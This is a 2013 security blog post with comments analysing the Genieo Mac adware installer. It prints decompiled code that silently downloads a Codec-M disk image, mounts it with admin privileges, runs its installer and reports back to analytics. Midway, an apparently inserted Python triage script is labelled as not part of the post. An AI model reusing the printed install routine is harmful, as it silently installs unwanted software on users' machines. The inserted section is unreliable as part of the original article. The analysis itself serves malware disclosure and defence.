
More details on Genieo adware

Published May 23rd, 2013 at 4:16 PM EST , modified May 23rd, 2013 at 4:19 PM EST

On Tuesday, I posted an article about a potentially malicious Genieo installer. This has resulted in a couple of anti-virus companies labeling the Genieo software as a trojan. Intego has since revealed an interesting discovery, and I have been pursuing some leads of my own. Taken together, these developments call into question whether this is just an isolated incident involving one of Genieo’s partners, or a problem with Genieo itself.

Intego posted an update today in which they revealed the discovery of code indicating that Softonic has some involvement with Genieo. Regular readers will remember that I called for a boycott of Softonic last month, due to the inclusion of adware in free software downloads that should not have contained it. It’s unclear exactly what the relationship between Softonic and Genieo is, but one thing is for sure: Softonic is listed (as “softonic2”) as a partner on Genieo’s Download Helper page.

Genieo partner Softonic

I have also been investigating claims that there is a reference to Codec-M in the Genieo installer. Codec-M, aka FkCodec, was an adware trojan that disguised itself as a video codec. It was discovered a little more than a year ago, and I described it at the time in an article titled OSX/FkCodec-A in action. Thus, the idea that there may be a connection between Codec-M and Genieo is quite concerning.

Searching the code in the installer’s executable file does indeed reveal a link to a codecm.dmg file, hosted at download.genieo.com for a partner named “webpic.” Trying to load that link in a web browser results in an odd error message suggesting that the file may require some kind of authentication to retrieve.

Further exploration of the code reveals the function that accesses that string:

function methImpl_UpdaterMacAppDelegate_install3rdPartyAppsForWebpic {
    var_24 = rdi;
    rax = [NSURL URLWithString:@"http://download.genieo.com/partner/webpic/mac_release/live/codecm.dmg"];
    rax = [NSURLRequest requestWithURL:rax cachePolicy:0x0 timeoutInterval:r8];
    r12 = rax;
    var_40 = 0x0;
    var_32 = 0x0;
    rbx = 0x0;
    r14 = &var_32;
    r13 = &var_40;

loc_10000450c:
    var_32 = 0x0;
    rax = [*bind__OBJC_CLASS_$_NSURLConnection sendSynchronousRequest:r12 returningResponse:r13 error:r14];
    if (var_32 != 0x0) goto loc_0x100004558;
    goto loc_100004534;

loc_100004558:
    sleep(0x1e);
    if (rbx + 0x1 != 0x3) goto loc_0x10000450c;

loc_100004613:
    rdx = @"&3rdPartyInstalled_codecm=no";

loc_10000461a:
    rax = [var_24 reportToAnalytics:edx];
    return rax;

loc_100004534:
    rax = [rax writeToFile:@"/tmp/codecm.dmg" atomically:0x1];
    if (rax != 0x0) goto loc_0x10000463a;
    goto loc_100004558;

loc_10000463a:
    rax = [NSArray alloc];
    rdi = rax;
    rax = [rdi initWithObjects:@"mount", @"/tmp/codecm.dmg", @"-mountpoint", @"/Volumes/codecm"];
    rax = [rax autorelease];
    rax = [var_24 runWithArgs:@"/usr/bin/hdiutil" args:rax wait:0x1 asAdmin:0x1];
    if (rax == 0x0) goto loc_0x100004613;
    rax = [var_24 runWithArgs:@"/Volumes/Codec-M Installer/Codec-M Installer.app/Contents/MacOS/Installer" args:0x0 wait:0x1 asAdmin:0x0];
    rbx = rax;
    rax = [r13 alloc];
    rdi = rax;
    rax = [rdi initWithObjects:@"unmount", @"/Volumes/codecm", @"-quiet", 0x0];
    rax = [rax autorelease];
    [var_24 runWithArgs:@"/usr/bin/hdiutil" args:rax wait:0x1 asAdmin:0x1];
    rdx = @"&3rdPartyInstalled_codecm=yes";
    if (rbx != 0x0) goto loc_0x10000461a;
    goto loc_100004613;
}

This is a lot to wade through, but if I’m reading it right, it boils down to downloading that file (retrying up to three times, with a 30-second pause between attempts), writing it to /tmp/codecm.dmg, mounting the disk image with hdiutil using admin privileges, running the installer it contains, unmounting the image, and then reporting to Genieo’s analytics whether the install succeeded. (Incidentally, the path listed for the installer executable exactly matches my sample of the installer for the Codec-M trojan.)
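Reading a listing like this by hand is error-prone, so here is an added example (my own code, not anything from the post or from Genieo) of a small static-triage script that pulls the behaviour-relevant literals out of Hopper-style pseudocode. It assumes one statement per line with string literals written as @"...", and runs over a constructed excerpt of the listing above; it extracts the download URL, the file written, each command launched via runWithArgs: together with its asAdmin flag, and the analytics keys, then turns them into reviewer-facing risk flags.

```python
import re
from dataclasses import dataclass, field

# Constructed excerpt of the Hopper-style pseudocode shown above (not the full listing).
LISTING = '''
    rax = [NSURL URLWithString:@"http://download.genieo.com/partner/webpic/mac_release/live/codecm.dmg"];
    rdx = @"&3rdPartyInstalled_codecm=no";
    rax = [rax writeToFile:@"/tmp/codecm.dmg" atomically:0x1];
    rax = [var_24 runWithArgs:@"/usr/bin/hdiutil" args:rax wait:0x1 asAdmin:0x1];
    rax = [var_24 runWithArgs:@"/Volumes/Codec-M Installer/Codec-M Installer.app/Contents/MacOS/Installer" args:0x0 wait:0x1 asAdmin:0x0];
    [var_24 runWithArgs:@"/usr/bin/hdiutil" args:rax wait:0x1 asAdmin:0x1];
    rdx = @"&3rdPartyInstalled_codecm=yes";
'''

URL_RE = re.compile(r'URLWithString:@"([^"]+)"')
WRITE_RE = re.compile(r'writeToFile:@"([^"]+)"')
RUN_RE = re.compile(r'runWithArgs:@"([^"]+)".*?asAdmin:(0x[0-9a-fA-F]+)')
ANALYTICS_RE = re.compile(r'@"(&[A-Za-z0-9_]+=[A-Za-z0-9]+)"')

@dataclass
class Triage:
    urls: list = field(default_factory=list)        # remote resources fetched
    writes: list = field(default_factory=list)      # local files written
    executions: list = field(default_factory=list)  # (binary, runs_as_admin)
    analytics: list = field(default_factory=list)   # status keys reported home

def triage_listing(text: str) -> Triage:
    """Walk the pseudocode line by line and collect the behaviour-relevant literals."""
    t = Triage()
    for line in text.splitlines():
        t.urls += URL_RE.findall(line)
        t.writes += WRITE_RE.findall(line)
        t.executions += [(b, int(a, 16) != 0) for b, a in RUN_RE.findall(line)]
        t.analytics += ANALYTICS_RE.findall(line)
    return t

def risk_flags(t: Triage) -> list:
    # Each flag is a finding a reviewer can act on; order follows the install flow.
    flags = []
    if any(u.lower().endswith(".dmg") for u in t.urls):
        flags.append("downloads a disk image from a remote host")
    if any(w.startswith("/tmp/") for w in t.writes):
        flags.append("stages the payload under /tmp")
    if any(admin for _, admin in t.executions):
        flags.append("runs a command with admin privileges")
    if any("Installer" in binary for binary, _ in t.executions):
        flags.append("launches a third-party installer from the mounted image")
    if t.analytics:
        flags.append("reports install outcome to an analytics endpoint")
    return flags
```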

Further, it should be noted that this code is found not just in the custom installer for the genTugM partner, but also in the “plain vanilla” installer downloaded directly from the Genieo website. I also found other similar functions for other partners, including one for Qtrax, a digital music service that has had some legal issues, including possible piracy violations. (The Qtrax function installs Microsoft Silverlight and the Qtrax Player app.)

All in all, this is starting to look like Genieo is less a company wronged by its partner, and more a company engaged in some very shady dealings, potentially including the installation of known malware.


14 Comments

  • Jon Hendry says:

    For what it’s worth, Genieo’s official twitter account’s last activity was April 19th, retweeting its CEO/co-founder Sol Tzvi announcing that they were looking to buy more Mac OS traffic, with a link to a post on LinkedIn.

    https://twitter.com/soltzvi/status/325190392221945856

    From LinkedIn: “Hi guys, we are looking for quality Mac OS traffic (PPI model) High volume only!
    Please contact: partners@genieo.com subject: Mac Traffic”

    The next tweet on the Genieo account is from a month earlier, just a self-promoting tweet.

  • Genieo Team says:

    Hi Thomas,

    I do not know what FkCodec is, so I believe you when you say it is not a nice thing.

    But can you please explain how you got from Codec-M to FkCodec?
    I could not find any references to this (other than your post) on the internet.

  • Genieo Team says:

    Referring me to another article posted by you is not really a good reference.

    Besides, even you say it is easily uninstalled and does not harm the computer.

    So why you call it malware I still don’t know.

    • Thomas says:

      If you don’t like reading about my own experience with Codec-M, go to the link in the first sentence of that article and read what Sophos had to say. I classify Codec-M as malware (and I’m obviously not alone here) because it calls itself a video codec, yet it is not. It is adware that perpetrates click fraud.

      You’re avoiding the issue. Why does the Genieo installer – including the one downloaded directly from the Genieo home page – include code that appears to install Codec-M, which is classified as malware by multiple security companies?

      • Someone says:

        Um, anyone notice that the person challenging Thomas is called “Genieo Team?” You can make your own hypotheses about the identity of this person.

  • Genieo Team says:

    Yes, I’m a Genieo employee and I’m not hiding it.
    I’m not challenging anyone, I’m just trying to understand things.

    As for the codec-m issue,
    I can give you a full explanation on how and why it’s (disabled) in Genieo code.
    Instead, we have removed it completely from our code, and as we release new updates it will be deleted from all Genieo clients out there (and will not be in new ones).

    • Thomas says:

      Removing the code to install malware after getting caught red-handed is no substitute for explaining why it was there in the first place. It should go without saying, but no explanation = no credibility.

    • Someone says:

      I don’t want to be a pain, and raise a dead issue, but I kinda have to. You said, and I quote, “Referring me to another article posted by you is not really a good reference.” And you also said, and I quote, “Yes, I’m a Genieo employee and I’m not hiding it.” Since you are a Genieo employee, that implies that Genieo is paying you to challenge Thomas’s discrediting your crapware. Therefore, you are not a reliable source of information or “a good reference.”

      Technically, this can be classified as hypocrisy of the highest (or rather, lowest) order.

  • Damien says:

    This doesn’t surprise me in the slightest. Any company whose business model relies on tricking the end user into installing their software can’t be trusted. This is why I actively block the installation of Genieo (and MacKeeper) on the 1000+ Macs that I oversee.

  • #thevirtualcurtain says:

    Y U NO RESPOND GENIEO TEAM?

    • Someone says:

      Why doesn’t Genieo Team respond to what? Genieo reps have been quite.. um… vocal… in argument with this article. Read some of the past comments.

      IMHO, Genieo has no more to say. Actions (and adware) speak louder than words…
